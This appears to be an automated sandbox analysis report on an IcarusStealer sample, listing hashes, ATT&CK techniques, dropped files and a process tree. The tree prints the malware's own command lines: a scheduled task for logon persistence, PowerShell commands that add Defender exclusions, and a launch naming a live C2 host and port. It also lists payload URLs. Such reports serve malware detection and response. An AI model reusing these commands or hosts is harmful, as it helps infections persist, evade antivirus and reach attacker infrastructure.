icarusstealer | 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Analysis

max time kernel
138s
max time network
180s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09/03/2024, 22:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom111.exe
Size

24.9MB
MD5

4e1c29f0c1af62ddea916c6b80548c76
SHA1

38d9f15356b6a65f4e76ee739867d55b01493793
SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
SHA512

f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
SSDEEP

49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	custom111.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	switched.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	tesetey.exe

Executes dropped EXE 4 IoCs

pid	Process
2548	Client.exe
4456	switched.exe
4288	pulse x loader.exe
3700	tesetey.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
82	raw.githubusercontent.com
83	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
91	ipinfo.io

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\CatRoot\$SXR\Read.txt	Client.exe
File created	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3700 set thread context of 4436	3700	tesetey.exe	131

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1768	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5024	timeout.exe

Modifies registry class 6 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{7CA9FA90-2D42-4720-9731-185F9E293BBD}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
2548	Client.exe
3700	tesetey.exe
3700	tesetey.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4288	pulse x loader.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	3700	tesetey.exe
Token: SeDebugPrivilege	2548	Client.exe
Token: SeShutdownPrivilege	1928	explorer.exe
Token: SeCreatePagefilePrivilege	1928	explorer.exe
Token: SeShutdownPrivilege	1928	explorer.exe
Token: SeCreatePagefilePrivilege	1928	explorer.exe
Token: SeShutdownPrivilege	1928	explorer.exe
Token: SeCreatePagefilePrivilege	1928	explorer.exe
Token: SeShutdownPrivilege	1928	explorer.exe
Token: SeCreatePagefilePrivilege	1928	explorer.exe
Token: SeShutdownPrivilege	1928	explorer.exe
Token: SeCreatePagefilePrivilege	1928	explorer.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe
1928	explorer.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 752 wrote to memory of 2548	752	custom111.exe	100
PID 752 wrote to memory of 2548	752	custom111.exe	100
PID 752 wrote to memory of 2548	752	custom111.exe	100
PID 752 wrote to memory of 4456	752	custom111.exe	101
PID 752 wrote to memory of 4456	752	custom111.exe	101
PID 752 wrote to memory of 4456	752	custom111.exe	101
PID 4456 wrote to memory of 4288	4456	switched.exe	102
PID 4456 wrote to memory of 4288	4456	switched.exe	102
PID 4456 wrote to memory of 3700	4456	switched.exe	103
PID 4456 wrote to memory of 3700	4456	switched.exe	103
PID 4456 wrote to memory of 3700	4456	switched.exe	103
PID 4288 wrote to memory of 4892	4288	pulse x loader.exe	104
PID 4288 wrote to memory of 4892	4288	pulse x loader.exe	104
PID 4892 wrote to memory of 2300	4892	cmd.exe	107
PID 4892 wrote to memory of 2300	4892	cmd.exe	107
PID 4892 wrote to memory of 1568	4892	cmd.exe	108
PID 4892 wrote to memory of 1568	4892	cmd.exe	108
PID 4892 wrote to memory of 1032	4892	cmd.exe	109
PID 4892 wrote to memory of 1032	4892	cmd.exe	109
PID 3700 wrote to memory of 4692	3700	tesetey.exe	119
PID 3700 wrote to memory of 4692	3700	tesetey.exe	119
PID 3700 wrote to memory of 4692	3700	tesetey.exe	119
PID 2548 wrote to memory of 2424	2548	Client.exe	122
PID 2548 wrote to memory of 2424	2548	Client.exe	122
PID 2548 wrote to memory of 2424	2548	Client.exe	122
PID 2424 wrote to memory of 1768	2424	cmd.exe	124
PID 2424 wrote to memory of 1768	2424	cmd.exe	124
PID 2424 wrote to memory of 1768	2424	cmd.exe	124
PID 2548 wrote to memory of 436	2548	Client.exe	125
PID 2548 wrote to memory of 436	2548	Client.exe	125
PID 2548 wrote to memory of 436	2548	Client.exe	125
PID 4692 wrote to memory of 3920	4692	csc.exe	127
PID 4692 wrote to memory of 3920	4692	csc.exe	127
PID 4692 wrote to memory of 3920	4692	csc.exe	127
PID 436 wrote to memory of 5024	436	cmd.exe	128
PID 436 wrote to memory of 5024	436	cmd.exe	128
PID 436 wrote to memory of 5024	436	cmd.exe	128
PID 3700 wrote to memory of 1928	3700	tesetey.exe	129
PID 3700 wrote to memory of 1928	3700	tesetey.exe	129
PID 3700 wrote to memory of 1796	3700	tesetey.exe	130
PID 3700 wrote to memory of 1796	3700	tesetey.exe	130
PID 3700 wrote to memory of 1796	3700	tesetey.exe	130
PID 3700 wrote to memory of 4436	3700	tesetey.exe	131
PID 3700 wrote to memory of 4436	3700	tesetey.exe	131
PID 3700 wrote to memory of 4436	3700	tesetey.exe	131
PID 3700 wrote to memory of 4436	3700	tesetey.exe	131
PID 3700 wrote to memory of 4436	3700	tesetey.exe	131
PID 3700 wrote to memory of 4436	3700	tesetey.exe	131
PID 3700 wrote to memory of 4436	3700	tesetey.exe	131
PID 3700 wrote to memory of 4436	3700	tesetey.exe	131

C:\Users\Admin\AppData\Local\Temp\custom111.exe
"C:\Users\Admin\AppData\Local\Temp\custom111.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:752
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2424
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
      4⤵
      Creates scheduled task(s)
      PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2BD4.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5024
  - - C:\Windows\System32\CatRoot\$SXR\$SXR.exe
      "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
      4⤵
      PID:932
- C:\Users\Admin\AppData\Local\Temp\switched.exe
  "C:\Users\Admin\AppData\Local\Temp\switched.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4456
- - C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4892
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        5⤵
        
        PID:2300
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:1568
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:1032
- - C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3700
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s0g0bsss\s0g0bsss.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4692
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D2C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC91A0527E7C684A849C87D678CC346AB.TMP"
        5⤵
        
        PID:3920
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1928
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit
      4⤵
      PID:1796
    - - C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
        
        C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
        5⤵
        
        PID:4324
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      4⤵
      PID:4436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
        5⤵
        
        PID:2224
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        6⤵
        
        PID:5336
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
        5⤵
        
        PID:392
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
        6⤵
        
        PID:5408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1424 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:8
1⤵
PID:4296

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3384

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:1768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
2.8MB

MD5
0113cfd72164ed38e62fb5932fa49287

SHA1
179ce87d746d2e75521250e9e43cf3767c08cba6

SHA256
7968a7fbdec7cbca5ddc2bbfd5b216a778b89c1712712bdd4ce326fa808710e6

SHA512
90ae925af55a5242f6aa5329b1f7f48f284723aa122ba86b77969db55215412000a998ee15104f472d2d497313176c3badf16d9ef8e83432a40988603c32b76e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
21.2MB

MD5
cad2b1bc54cc85d5d0c0a425e66947f4

SHA1
235d00ef89adb5b987f8e0f253ce2e483a136d24

SHA256
870fad411f0f32d80ea71e0261685acb76be06153f702b421d120cd6e2f2fe03

SHA512
e9b6b4fcd8296e80e93a60474d279df92b6882f732aa14af129ec3da81a06519ad4b1ac45bf1c03382d438990726729ef8750e642ed9b406a01201d76ebe69c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
4.9MB

MD5
295f171ff87e2bbeb3acbe1deae772fc

SHA1
ccfad201deb07a4bc9af2c25d266978691bd4dc7

SHA256
dbdd6f6c15a3f7cf555aaae257f757fef26920cb08b141737f0c2c482be9a266

SHA512
04860b88e0cafadfff6edcad1889fcacb127a3bb9531909bbba4f70dc7b7b5d6ab562a1a682504a4f573b3cabc87185d680c8be699bcbee5370089112ff2547e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2D2C.tmp

Filesize
1KB

MD5
b56b29489e99504a995c54df86c90307

SHA1
acbd9445b74315f5bca4f80b1b46df5b96d83c96

SHA256
7d23e5c501e8cabb2e5909a4e1947be0f3709ab09bcf29e4a22286c15d4dcdb4

SHA512
c6bff1003a94fb2e39cf252f8f6eece4c36840cac3770ea2736566e4df2e9fdcac2e75fba5040f13f8e47cdc48250b6b074f4dcb4552001cfb9208bab3fd8074

Download Submit
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe

Filesize
4KB

MD5
9c9f3281f753e2df4a08055e711d8304

SHA1
f890cd4a56e9bbd5d6dc6e93848516058a419066

SHA256
38700ec0964dff88279bd9dfb4942a1b1cc6f480af7e870246c7f4112b35edac

SHA512
a621ef20b52e4177266035c7fc0b4459c6cbdb1b5d4f09ebfbd9f742594bc74e51a32c4f6896fac8c8acaa7a4c88af37a5445f034ea7f09404432199a862d0a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.3MB

MD5
d7bc045f4b2c8431a271e8cffe6429d6

SHA1
b7be547021fd997a5e8cc3681252b76f3d5705a5

SHA256
0362d145cb8f9a4dc44556095ab24e6ddbea5979265daa3b25bcd64588eb13b2

SHA512
0e9ca893d79eedcd261ce3729bdfe18b7f02a575a5b2cfbf5aa9588786a71dddde42b3ba38c29e5fd29ed560c4a5d1b2c2537bb58bc31634b9fc01311b706fd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.5MB

MD5
3c44a38f09b794e632eee49ad99cd1bb

SHA1
6e9b131f1a891ca629e8159608b6fb20b0fc545a

SHA256
652f2f8ec7ea467ffc32ab89df2f52d60d424cea8d9d4947dddc23d4c351de21

SHA512
1685d6eb81c91b52506a5261fc0c0387889f8ae184ebd962058cb8e46c6f5dbdc9e073c45ed66921fa74e430b5578c41a90202a5e9f17b58618527673cd6b7a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.2MB

MD5
30c59e80a5aac9b0c130f5ed8c3f099f

SHA1
66e89c946359dbc0fdd8cf169ab423638c6af38e

SHA256
9240842c1b75df1e7a2eed604db7c4d8a9184aedb91fb9be968ae7b1ca30602a

SHA512
4c0847161ebd522a806b569bef6d1f00192928db6c5c5f946f35a5148d642d2d8556283521dcbcdfa4e341771d861f6ac7e2cd7f4c03724f0a846e9f5f886110

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
1.8MB

MD5
ff0f617153400ce370229083d7c6eb22

SHA1
ec939725c8fbb61fb61f65f2db0b5f34abbd6c42

SHA256
d01d25d000daecae2fa41e032fb9e2ad52d8baf963155c30cf923a6693d81a8f

SHA512
a49d5d6d5f6b79e07681ea8e1be3d521e326afa28f6ccab3b0c8b3b9c60af08940aed35690efc7735b29f3b89763eec435a91035bd381ff7d70f48117c8f6f9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
2.0MB

MD5
fe9ae5027af84d7f74fa84ef2b47af65

SHA1
e997a2bbb663c2836b70836bbc3e1f5aac17186c

SHA256
6f7aa576b0388478562162622a0204520cd916d190ec8e024fd3b8dc36ed9e3f

SHA512
5be07c8c6aad5226ab29c321274325e816100be7ea340865dfe6e946d4e911214430f3e02ed4ccdb8048f9eeeff3e760e4c99ff5b6735148c385330bc2745963

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
1.6MB

MD5
e08f770275ffecedcfb5522166299b3a

SHA1
ebf5b9641cbdccf5d42dbef0450a79d07e241f9b

SHA256
4b91ecfacae5659f92ef9e937a3d3938bbe62efc92083e556d3f610bb6a1d80f

SHA512
d7541f1a66153165957ff216deb5d73bc1a82697e01a46a25ee007243c683b1a84411a4892122237f41806bd22cfa90f42e4d71528fac69c1128a1dd32ab2cc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
57KB

MD5
006a580425f3d4d9289a981fe3f22ae6

SHA1
eb69fd8daadbe4ba3b5819a76347354fb0849df7

SHA256
1a0c2ca9ae227e02409686d2f199b3bd6bd23d6ef44ed28d027839d88e6c8f70

SHA512
26d0d55e2b76576c136b6cec2954e51c72bb5fc43cec11bb3b000e911206cf0ac82a5a6350f297157e7533123db84f1737e708c0b0c97117c34611eb0f3869b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2BD4.tmp.bat

Filesize
150B

MD5
975afadeb2c27378380d5aa0bb060ee3

SHA1
38d971c2348869d177b318481aaf219e948f7969

SHA256
46b3be7075739bc2200b89b16992b55b104ddd6b38289b924636d34c2309e049

SHA512
6a612587a02eae66f942546e16ee089a8764d7681c84ce042b97a9cef15f3392959e9682961dcca11c81c8930db5a610c13030d84582324907d36ea9f783b2a6

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
4.4MB

MD5
6e30e0586da2ef652e4f297206bd956f

SHA1
d6df8267ee2950b7e256047e5889e623b3a017cf

SHA256
4704db5292fdd690c261526125686304abd015378ef72e4f9125d693e0499e6f

SHA512
3564cbb0a05df8e6ca63fae6500994a5e8a5724910e4c6c4bbec0a88f670b9853f4397864f645773e8d2c0d6181d42b9133fe6a560baa7eea61655c1b49716c4

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
3.3MB

MD5
2da0d5e75917e1bf303628b461973a13

SHA1
a897fc3063d4b6948db4abca3c142e2b64c0da45

SHA256
e842f4a6f443b858644ddacd2563639889d1667666cd72ac0f95bbfeaeede1a5

SHA512
887624ad9a600261a081be98d3d624b57f120500584068521e784ef5f3d111a2f5fb6c4403cd8506a6cd010b2497e9b26499c30809b50aade5a6269313b7c79f

Download Submit
C:\Windows\System32\CatRoot\$SXR\Read.txt

Filesize
58B

MD5
79668a6729f0f219835c62c9e43b7927

SHA1
0cbbc7cc8dbd27923b18285960640f3dad96d146

SHA256
6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

SHA512
bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC91A0527E7C684A849C87D678CC346AB.TMP

Filesize
1KB

MD5
6d4e315ddb659723cf270858a8023839

SHA1
0df893c7f7f48483e29d8db81bfabc8456ba24a9

SHA256
f6528ea00f868ca00663e6aeff8def75c2db4a0b7012d9836f9267679b0e47f0

SHA512
70a5bb19c9384117a21eeb1ce2e44ffc055dbf5ff958e0b912823c353a283606bafb1b7d7a5c942ffe8ecd3890c88b88597d027c19952156fe959962422339a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s0g0bsss\s0g0bsss.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s0g0bsss\s0g0bsss.cmdline

Filesize
449B

MD5
615715b3461189c0896e22db958b9b7f

SHA1
72814d2e434f3e03ab36d36b1bbc3c2e62fe300d

SHA256
65aee4c646a266882d5d5724476ab93c5f013c57f9f835d264e64bde06214173

SHA512
2fc5a91e197ddeff0b5defd7a85dc08c1bec810ed0b5d4b8ca6b9b54c607ba853928a8505ff4db9698a184b64e194d5f875f647a19687ddbbe8ea6e206293396

Download Submit
memory/932-84-0x0000000005EE0000-0x0000000005EF0000-memory.dmp

Filesize
64KB

Download
memory/932-126-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/932-128-0x0000000005EE0000-0x0000000005EF0000-memory.dmp

Filesize
64KB

Download
memory/932-83-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/1768-96-0x00000243DE530000-0x00000243DE550000-memory.dmp

Filesize
128KB

Download
memory/1768-94-0x00000243DE570000-0x00000243DE590000-memory.dmp

Filesize
128KB

Download
memory/1768-98-0x00000243DE9A0000-0x00000243DE9C0000-memory.dmp

Filesize
128KB

Download
memory/1928-88-0x0000000003610000-0x0000000003611000-memory.dmp

Filesize
4KB

Download
memory/2548-55-0x0000000000EC0000-0x0000000000EE2000-memory.dmp

Filesize
136KB

Download
memory/2548-57-0x0000000000F60000-0x0000000000FC6000-memory.dmp

Filesize
408KB

Download
memory/2548-45-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/2548-42-0x00000000000F0000-0x0000000000730000-memory.dmp

Filesize
6.2MB

Download
memory/2548-72-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/2548-39-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/3700-40-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/3700-46-0x0000000004C80000-0x0000000004D12000-memory.dmp

Filesize
584KB

Download
memory/3700-47-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/3700-124-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/3700-41-0x0000000000020000-0x00000000000A2000-memory.dmp

Filesize
520KB

Download
memory/3700-48-0x0000000004C50000-0x0000000004C60000-memory.dmp

Filesize
64KB

Download
memory/3700-49-0x00000000068E0000-0x0000000006E84000-memory.dmp

Filesize
5.6MB

Download
memory/3700-44-0x0000000004A40000-0x0000000004ADC000-memory.dmp

Filesize
624KB

Download
memory/3700-56-0x0000000004C50000-0x0000000004C60000-memory.dmp

Filesize
64KB

Download
memory/4288-30-0x00007FF7ED6C0000-0x00007FF7EDAFC000-memory.dmp

Filesize
4.2MB

Download
memory/4288-43-0x00007FF7ED6C0000-0x00007FF7EDAFC000-memory.dmp

Filesize
4.2MB

Download
memory/4324-82-0x00007FFAE0F40000-0x00007FFAE1A01000-memory.dmp

Filesize
10.8MB

Download
memory/4324-127-0x000000001B0F0000-0x000000001B100000-memory.dmp

Filesize
64KB

Download
memory/4324-85-0x000000001B0F0000-0x000000001B100000-memory.dmp

Filesize
64KB

Download
memory/4324-78-0x00000000004E0000-0x00000000004E8000-memory.dmp

Filesize
32KB

Download
memory/4324-120-0x00007FFAE0F40000-0x00007FFAE1A01000-memory.dmp

Filesize
10.8MB

Download
memory/4436-73-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4436-116-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/4436-74-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/4436-86-0x0000000005160000-0x0000000005170000-memory.dmp

Filesize
64KB

Download
memory/5336-119-0x00000000028F0000-0x0000000002900000-memory.dmp

Filesize
64KB

Download
memory/5336-110-0x00000000028F0000-0x0000000002900000-memory.dmp

Filesize
64KB

Download
memory/5336-108-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/5336-114-0x0000000002930000-0x0000000002966000-memory.dmp

Filesize
216KB

Download
memory/5336-129-0x0000000005020000-0x0000000005042000-memory.dmp

Filesize
136KB

Download
memory/5408-113-0x00000000027A0000-0x00000000027B0000-memory.dmp

